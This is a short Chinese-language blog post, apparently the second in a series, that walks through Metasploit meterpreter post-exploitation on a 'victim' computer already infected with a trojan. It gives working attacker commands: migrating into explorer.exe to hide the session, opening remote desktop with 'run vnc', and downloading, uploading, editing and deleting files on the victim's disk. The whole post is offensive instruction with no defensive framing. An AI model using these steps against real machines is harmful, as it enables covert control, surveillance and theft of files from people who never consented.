MSF對木馬的利用

0x0

上一篇文章,我將受害者的電腦(ip:192.168.0.254)注入了木馬,並且確定了shell,現在讓我們看下怎麼在meterpreter下有更多的操作。

0x1

講下進程注入

找到桌面進程explorer.exe,記住他的PID 是4672

使用命令migrate 4672

注入成功!!

0x02

遠程桌面的開啟。

使用命令 run vnc

0x03

文件管理功能

download 下載文件 ***在攻擊機生成木馬的目錄下***

edit 編輯文件

cat 查看文件

mkdir 建立文件夾

upload 上傳文件

rmdir 刪除文件夾

打開c盤,然後使用ls就可以看到c盤的目錄。在meterpreter下的功能強大過在shell下的功能。以上的命令可以去試下。

Advertisements

Advertisements

你可能會喜歡